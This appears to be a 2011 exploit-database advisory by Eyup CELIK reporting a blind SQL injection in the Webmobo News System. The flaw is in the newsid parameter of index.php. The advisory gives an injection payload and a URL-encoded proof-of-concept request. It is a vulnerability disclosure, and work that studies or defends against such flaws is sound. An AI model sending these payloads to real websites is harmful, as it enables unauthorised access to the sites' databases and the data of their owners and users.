30 lines
No EOL
605 B
Text
30 lines
No EOL
605 B
Text
# Exploit Title: Webmobo News System Blind SQL Injection
|
|
# Date: 2011
|
|
# Author: Eyup CELIK
|
|
# Version: All Version
|
|
# Tested on: All versions are Vulnerability
|
|
# Web Site: www.eyupcelik.com.tr
|
|
|
|
|
|
ISSUE
|
|
|
|
Blind SQL Injection can be done using the command input
|
|
|
|
Vulnerable Page:
|
|
index.php
|
|
|
|
Example:
|
|
index.php?action=sendto&newsid=<Blind SQL Injection Code>
|
|
|
|
Exploit:
|
|
index.php?action=sendto&newsid=1' and '2'='2
|
|
|
|
POC:
|
|
http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
|
|
|
|
|
|
Thanks,
|
|
|
|
Eyup CELIK
|
|
Information Technology Security Specialist
|
|
http://www.eyupcelik.com.tr |